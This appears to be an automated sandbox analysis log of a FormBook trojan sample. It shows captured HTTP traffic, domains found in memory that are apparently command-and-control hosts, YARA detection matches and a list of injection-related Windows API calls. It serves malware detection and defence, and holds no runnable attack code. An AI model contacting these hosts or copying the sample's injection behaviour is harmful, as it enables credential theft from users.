          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:47:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tzRCHBFuAmixsbqmUDwArSs9qCY9i27FUN5LkJCPXcbvdLi6uMcMxY465hNXOHzZ3IE33BZ0IGk%2Bo2DutnibkEMi9AH7CBnlMGEzjIycRy%2ByGlg3Idlxk81jluvlAmfGpLrhf%2FiIhZBLYlXm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d06b8376dc98c87-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:47:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7qZmIIrcoC1kQovUaKDpvVpJ80SSS%2BCaKD%2FPzBTnCYwOzSTKNBPcSRoH0rxxllNFJiWNu6aAhg6hUW8QvzY1Rz5lEE1NfCqYSgd0FEmRaAXwK3Ag%2B%2BrJIe%2BdAM3A8XN4xkvNcQmArX4iXbOw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d06b8478dce443e-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:47:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7qZmIIrcoC1kQovUaKDpvVpJ80SSS%2BCaKD%2FPzBTnCYwOzSTKNBPcSRoH0rxxllNFJiWNu6aAhg6hUW8QvzY1Rz5lEE1NfCqYSgd0FEmRaAXwK3Ag%2B%2BrJIe%2BdAM3A8XN4xkvNcQmArX4iXbOw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d06b8478dce443e-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:47:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I11BaVq1cCi1YXatJQfQr7AG4OXMehuzA5%2FBg2jQUM9QF5ePyWS9KogFmbsKF7Vog4OJSf%2FNnCOVfEFE7e9ei%2BpHfYDWiThrGArL4iJ5rY%2Faul4GD87aYAVvIVZrZY%2FU2Q1zppDWQAzxpDar"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8d06b8573cc37d18-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Oct 2024 12:48:25 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Oct 2024 12:48:27 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Oct 2024 12:48:30 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Oct 2024 12:48:33 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: compact.exe, 00000005.00000002.3605554811.000000000483C000.00000004.10000000.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000002.3604847217.0000000003AFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://goge8opp.com:301
          Source: compact.exe, 00000005.00000002.3605554811.0000000004386000.00000004.10000000.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000002.3604847217.0000000003646000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yosoyemy.com/o1rp?Sh=TBsR9lfn
          Source: XFLTednCZUTqje.exe, 00000006.00000002.3606411027.0000000005578000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zt555.shop
          Source: XFLTednCZUTqje.exe, 00000006.00000002.3606411027.0000000005578000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zt555.shop/uj7x/
          Source: compact.exe, 00000005.00000002.3605554811.0000000004E84000.00000004.10000000.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000002.3604847217.0000000004144000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://yourtech-agency.com/99um/?f6SpQ=_n84nZ4HGta&Sh=sejrBqbnhxLzIpZobXocfoJh7
          Source: compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: compact.exe, 00000005.00000002.3605554811.00000000049CE000.00000004.10000000.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000002.3604847217.0000000003C8E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
          Source: compact.exe, 00000005.00000002.3605554811.00000000049CE000.00000004.10000000.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000002.3604847217.0000000003C8E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
          Source: compact.exe, 00000005.00000002.3605554811.00000000049CE000.00000004.10000000.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000002.3604847217.0000000003C8E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
          Source: compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: compact.exe, 00000005.00000002.3603499562.0000000003274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: compact.exe, 00000005.00000002.3603499562.0000000003274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: compact.exe, 00000005.00000002.3603499562.0000000003274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: compact.exe, 00000005.00000002.3603499562.0000000003274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
          Source: compact.exe, 00000005.00000002.3603499562.0000000003274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: compact.exe, 00000005.00000003.2149956057.0000000008024000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
          Source: compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.NjjLYnPSZr.exe.df0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.3604353824.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3606411027.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.3604571155.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3604458798.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1971118603.0000000000D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1971533263.0000000001E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3603288385.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 0.2.NjjLYnPSZr.exe.df0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.3604353824.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.3606411027.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.3604571155.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.3604458798.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1971118603.0000000000D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1971533263.0000000001E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.3603288385.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00E1C4A3 NtClose,0_2_00E1C4A3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062B60 NtClose,LdrInitializeThunk,0_2_01062B60
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_01062DF0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_01062C70
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010635C0 NtCreateMutant,LdrInitializeThunk,0_2_010635C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01064340 NtSetContextThread,0_2_01064340
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01064650 NtSuspendThread,0_2_01064650
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062B80 NtQueryInformationFile,0_2_01062B80
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062BA0 NtEnumerateValueKey,0_2_01062BA0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062BE0 NtQueryValueKey,0_2_01062BE0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062BF0 NtAllocateVirtualMemory,0_2_01062BF0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062AB0 NtWaitForSingleObject,0_2_01062AB0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062AD0 NtReadFile,0_2_01062AD0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062AF0 NtWriteFile,0_2_01062AF0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062D00 NtSetInformationFile,0_2_01062D00
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062D10 NtMapViewOfSection,0_2_01062D10
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062D30 NtUnmapViewOfSection,0_2_01062D30
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062DB0 NtEnumerateKey,0_2_01062DB0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062DD0 NtDelayExecution,0_2_01062DD0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062C00 NtQueryInformationProcess,0_2_01062C00
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062C60 NtCreateKey,0_2_01062C60
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062CA0 NtQueryInformationToken,0_2_01062CA0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062CC0 NtQueryVirtualMemory,0_2_01062CC0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062CF0 NtOpenProcess,0_2_01062CF0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062F30 NtCreateSection,0_2_01062F30
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062F60 NtCreateProcessEx,0_2_01062F60
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062F90 NtProtectVirtualMemory,0_2_01062F90
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062FA0 NtQuerySection,0_2_01062FA0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062FB0 NtResumeThread,0_2_01062FB0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062FE0 NtCreateFile,0_2_01062FE0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062E30 NtWriteVirtualMemory,0_2_01062E30
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062E80 NtReadVirtualMemory,0_2_01062E80
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062EA0 NtAdjustPrivilegesToken,0_2_01062EA0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062EE0 NtQueueApcThread,0_2_01062EE0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01063010 NtOpenDirectoryObject,0_2_01063010
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01063090 NtSetValueKey,0_2_01063090
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010639B0 NtGetContextThread,0_2_010639B0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01063D10 NtOpenProcessToken,0_2_01063D10
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01063D70 NtOpenThread,0_2_01063D70
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03854340 NtSetContextThread,LdrInitializeThunk,5_2_03854340
